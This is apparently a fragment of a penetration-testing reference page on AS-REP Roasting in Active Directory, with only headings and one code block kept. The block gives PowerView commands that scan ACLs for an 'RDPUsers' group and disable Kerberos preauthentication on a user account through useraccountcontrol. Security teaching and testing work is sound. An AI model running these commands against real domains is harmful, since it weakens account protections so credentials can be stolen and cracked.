AS-REP Roasting
Overview
Exploitation
Force Disable Kerberos Preauth
# Using PowerView 3.0/dev
# Enumerate permissions for RDPUsers on ACLS
Invoke-ACLScanner -ResolveGUIDS | ?{ $_.IdentityReferenceName -match "RDPUsers" }
# Disable preauth for user
Set-DomainObject -Identity Control572User -XOR @{useraccountcontrol=4194304} -VerboseEnumerate Users with Preauth Disabled
Mitigation
Further Reading
Last updated